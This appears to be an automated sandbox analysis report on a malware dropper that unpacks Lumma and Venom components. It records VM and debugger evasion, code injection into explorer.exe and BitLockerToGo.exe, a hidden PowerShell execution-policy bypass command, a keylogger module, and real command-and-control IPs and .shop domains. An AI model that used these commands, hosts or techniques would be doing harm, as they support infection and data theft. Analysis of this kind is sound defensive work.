HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: explorer.exe, 00000001.00000000.1699388658.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2569026417.0000000003385000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2751996058.0000000003385000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000002.3064823525.0000000000514000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lm.exe, 00000014.00000003.2652802759.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: EF14.exe	Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: explorer.exe, 00000001.00000000.1697734591.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: BitLockerToGo.exe, 00000010.00000002.2751996058.000000000334B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: 2D42.exe, 0000000A.00000002.2815804858.000001E01D94A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: explorer.exe, 00000001.00000000.1699388658.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: EF14.exe, 00000009.00000002.2563763619.000001FBFEF48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2710861827.000001B9D1260000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000013.00000002.4108045764.0000000000694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000017.00000002.2771894139.0000020017A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EF14.exe	Binary or memory string: W5Y0tdCLLaYcvsKzyKBjidpmE1BHc86vjlhun29UAQ6rJZ1+hAUJMv6yDSm77LFR/At8wqZArKFjRxye1Iekrog93ttnyK5FEDw6+RPvmPZJmn2Ny6c69E2SUhEO/vtkGH1tLlOBSTv07SHKhP/k6uLKuu96C1dMI7KMMDP4XkpI2+Y6DismsMB9BV85H06QXorwQF/T+HT6QsQfi/vOoJWQZYuU+4o6mvX48r/Ht0VEJcT/p2XyRwBvMciXpPpRvoj9

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	System information queried: CodeIntegrityInformation			Jump to behavior

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\2D42.exe

Code function: 10_2_00007FFD9BAC3329 CheckRemoteDebuggerPresent,

10_2_00007FFD9BAC3329

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process queried: DebugPort

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_03089D10 LdrInitializeThunk,

16_2_03089D10

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_6C8EDF8B

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

19_2_6C8D64F0

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8EF853 mov eax, dword ptr fs:[00000030h]	19_2_6C8EF853
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8ED49D mov ecx, dword ptr fs:[00000030h]	19_2_6C8ED49D
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C87F853 mov eax, dword ptr fs:[00000030h]	20_2_6C87F853
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C87D49D mov ecx, dword ptr fs:[00000030h]	20_2_6C87D49D

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 19_2_6C8F6CF0 GetProcessHeap,HeapAlloc,

19_2_6C8F6CF0

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8EDF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6C8EDF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E8B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6C8E8B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E90B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6C8E90B9
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C87DF8B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_6C87DF8B
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C878B9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_6C878B9F
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C8790B9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_6C8790B9

Source: C:\Users\user\AppData\Local\Temp\2D42.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 8EC7.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.145.236.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.144.253.197 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

.NET source code references suspicious native API functions

Source: 2D42.exe.1.dr, SAPIENHost.cs	Reference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory allocated: C:\Windows\explorer.exe base: 3010000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory allocated: C:\Windows\explorer.exe base: 3060000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory allocated: C:\Windows\explorer.exe base: 3070000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory allocated: C:\Windows\explorer.exe base: 3080000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and write	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\2D42.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe

Memory protected: C:\Windows\explorer.exe base: 3010000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Thread created: C:\Windows\explorer.exe EIP: 7D819D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Thread created: unknown EIP: 33E19D0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\EF14.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: PID: 2580 base: 3010000 value: 20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: PID: 2580 base: 3011000 value: 48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: PID: 2580 base: 3080030 value: 00	Jump to behavior

LummaC encrypted strings found

Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: EF14.exe, 00000009.00000003.2545308831.000001FBFFE50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\adjijwj	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: C:\Windows\explorer.exe base: 3010000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: C:\Windows\explorer.exe base: 3011000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Memory written: C:\Windows\explorer.exe base: 3080030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F5F008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe

Code function: 7_2_00007FF64166F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,

7_2_00007FF64166F310

Source: explorer.exe, 00000001.00000000.1697550240.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1696507725.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
